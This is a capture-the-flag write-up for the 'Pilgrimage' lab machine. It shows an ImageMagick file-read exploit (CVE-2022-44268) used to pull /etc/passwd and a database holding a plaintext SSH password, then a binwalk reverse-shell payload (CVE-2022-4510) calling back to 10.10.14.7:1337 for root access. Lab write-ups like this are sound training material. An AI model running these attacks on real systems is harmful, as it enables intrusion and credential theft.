Pilgrimage

Port Scanning

First, we perform port scanning on the machine.

sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.219

We found .git directory on the website.

Exploitation

After we found .git directory, we can dump the directory to get the source code using Git Dumper.

python3 git_dumper.py http://pilgrimage.htb/.git/ Pilgrimage

Now, move to Pilgrimage.

On index.php, we know that the application using the magick binary to process the image.

exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);

The "magick" binary itself is ImageMagick, open-source software suite, used for editing and manipulating digital images.

Search on Google, i found this exploit for ImageMagick 7.1.0-49.

• https://www.exploit-db.com/exploits/51261

• https://github.com/voidz0r/CVE-2022-44268

After download the exploit, run this command to generate image with payload.

cargo run "/etc/passwd"

Now, upload the image.png to the target.

Next, download the converted image, and analyze the converted image using this command:

identify -verbose 64a0e52437392.png

Convert the hex to text with xxd command.

echo "hex value here" | xxd -r -p

Back to index.php again, we found that the website using sqlite database, stored at /var/db/pilgrimage. We can read the db content using above exploit.

Again, upload the image to the website, and download the converted image. Next, get the hex value using xxd command.

Since the hex value is too long, you can save the command into a script.

nano db.sh

Inside db.sh, add this line:

#!/bin/bash
echo "hex value" | xxd -r -p

Then execute this command.

bash db.sh > asuka.sqlite

Now, we can use sqlite database client to read the database content.

➜  tmp sqlite3 asuka.sqlite 
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES('emily','abigchonkyboi123');
CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL);
COMMIT;
sqlite> 

Now, we can use the credentials to login into SSH.

Get Low User

ssh emily@pilgrimage.htb

Privilege Escalation

We found a suspicious process with UID 0 (root) that could potentially be our pathway to gaining root access.

/bin/bash /usr/sbin/malwarescan.sh 
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/

This is the content of malwarescan.sh

#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

In summary, this script provides a way to monitor the /var/www/pilgrimage.htb/shrunk/ directory for newly created files using binwalk and automatically deletes files that match specific criteria defined in the blacklist array.

After check the binwalk version, we know that this binwalk is vulnerable to CVE-2022-4510.

We can use this script:

Before that, nn our local machine run nc to listen at port 1337.

Upload the script to target machine, and generate the reverse shell payload.

python3 RCE_Binwalk.py asuka.png 10.10.14.7 1337

Next, copy the generated image to /var/www/pilgrimage.htb/shrunk/ directory.

Using pspy, we can confirm that the binwalk execute our payload.

Checking our netcat, we received a connection from the target with the root user.